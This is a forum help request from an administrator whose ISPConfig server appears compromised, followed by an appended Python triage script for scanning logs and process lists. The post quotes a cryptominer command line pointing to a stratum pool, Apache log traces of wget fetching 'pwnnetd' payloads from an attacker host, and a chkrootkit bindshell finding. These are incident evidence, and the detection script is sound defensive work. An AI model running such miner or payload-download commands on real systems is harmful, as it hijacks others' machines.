Hello,
I have a big problem; I suspect that my ISPConfig server has been taken over by a third party!
Distribution: Debian squeeze (6.0.8)
ISPConfig: 3.0.3.3
This is what I can observe:
In the process list (top), services with names like s, vi, k, ... keep starting.
When such a service starts, my server is at 99.98 % load and I can see extremely high network activity.
Here are the processes:
www-data 7842 93.7 0.4 29520 4296 ? S 12:43 75:48 /usr/sbin/acpid
www-data 11279 4.6 0.1 41032 1572 ? Ssl 13:21 2:01 m64 -o stratum+tcp://5.254.102.165:3333 -O judge.1:x -B
root 13973 0.0 0.0 10452 492 ? Ss 14:04 0:00 vzctl: ttyp0
In the logs I found the following:
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] --2013-12-03 12:10:46-- (try: 3) http://hecks.ddosdev.com/pwnnetd
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] --2013-12-03 12:10:46-- (try: 3) http://hecks.ddosdev.com/pwnnetd3
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] failed: Connection timed out.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] Retrying.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] failed: Connection timed out.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] Retrying.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] --2013-12-03 12:11:10-- (try: 4) http://hecks.ddosdev.com/pwnnetd
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] --2013-12-03 12:11:10-- (try: 4) http://hecks.ddosdev.com/pwnnetd3
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] connected.
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] HTTP request sent, awaiting response...
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] connected.
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] HTTP request sent, awaiting response...
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] 200 OK
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] Length:
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] 379680
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] (371K)
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] Saving to: `pwnnetd3.3'
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] 0K
rkhunter found nothing!
chkrootkit reports the following:
Checking `bindshell'...INFECTED (PORTS: 465)
Searching for suspicious files and dirs, it may take a while... The following suspicious files and directories were found: /usr/lib/pymodules/python2.6/.path /lib/init/rw/.ramfs
Can anyone help me with this?
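As an added example (not part of the original post and not ISPConfig code), a small triage script that picks out of an Apache error_log the wget download traces seen above (a web process shelling out to wget leaves its progress output there) and flags `ps aux` lines where the web-server uid is running a stratum mining client or a process at unusual CPU. The sample log and process lines are constructed in the post's format; hosts and addresses are placeholders, not indicators from the post.

```python
import re
# Apache error_log prefix "[timestamp] [error] [client IP] message" (message may be empty)
APACHE_RE = re.compile(r"^\[[^\]]+\] \[error\] \[client (?P<ip>[^\]]+)\] ?(?P<msg>.*)$")
# wget progress output as it lands in error_log when a web process shells out to wget
WGET_START_RE = re.compile(r"--\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}--\s+(?:\(try: ?\d+\)\s+)?(?P<url>https?://\S+)")
WGET_SAVE_RE = re.compile(r"Saving to: `(?P<file>[^']+)'")
# stratum+tcp is the mining-pool protocol; a web-server uid speaking it is a strong signal
STRATUM_RE = re.compile(r"stratum\+tcp://(?P<pool>[^\s/]+)")

def scan_error_log(lines):
    """Return (downloads, saved): [(client_ip, url)] and [(client_ip, file)] from wget traces."""
    downloads, saved = [], []
    for line in lines:
        m = APACHE_RE.match(line)
        if not m:
            continue
        ip, msg = m.group("ip"), m.group("msg")
        u, s = WGET_START_RE.search(msg), WGET_SAVE_RE.search(msg)
        if u and (ip, u.group("url")) not in downloads:  # retries repeat the same URL
            downloads.append((ip, u.group("url")))
        if s:
            saved.append((ip, s.group("file")))
    return downloads, saved

def scan_ps(lines, web_users=("www-data",), cpu_threshold=50.0):
    """Flag 'ps aux' lines where a web-server uid runs a miner or burns unusual CPU."""
    hits = []
    for line in lines:
        parts = line.split(None, 10)  # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        if len(parts) < 11 or parts[0] not in web_users:
            continue
        pid, cpu, cmd = int(parts[1]), float(parts[2]), parts[10]
        m = STRATUM_RE.search(cmd)
        if m:
            hits.append((pid, "stratum pool " + m.group("pool")))
        elif cpu >= cpu_threshold:
            hits.append((pid, "high cpu for web uid: " + cmd))
    return hits
# Constructed samples in the post's format; hosts/addresses are placeholders, not real indicators.
SAMPLE_ERROR_LOG = [
    "[Tue Dec 03 12:10:46 2013] [error] [client 203.0.113.5] --2013-12-03 12:10:46-- (try: 3) http://dropper.example/pwnnetd",
    "[Tue Dec 03 12:11:10 2013] [error] [client 203.0.113.5] --2013-12-03 12:11:10-- (try: 4) http://dropper.example/pwnnetd",
    "[Tue Dec 03 12:11:23 2013] [error] [client 203.0.113.5] Saving to: `pwnnetd3.3'",
    "[Tue Dec 03 12:12:00 2013] [error] [client 203.0.113.9] File does not exist: /var/www/favicon.ico",
]
SAMPLE_PS = [
    "www-data 7842 93.7 0.4 29520 4296 ? S 12:43 75:48 /usr/sbin/acpid",
    "www-data 11279 4.6 0.1 41032 1572 ? Ssl 13:21 2:01 m64 -o stratum+tcp://203.0.113.10:3333 -O worker:x -B",
    "root 13973 0.0 0.0 10452 492 ? Ss 14:04 0:00 vzctl: ttyp0",
]
```

Run it against the real error_log and a `ps aux` dump taken before the box is rebuilt; the distinct URLs and saved filenames give you what to pull for analysis, and the flagged PIDs are the ones to collect `/proc/<pid>/exe` and open sockets from.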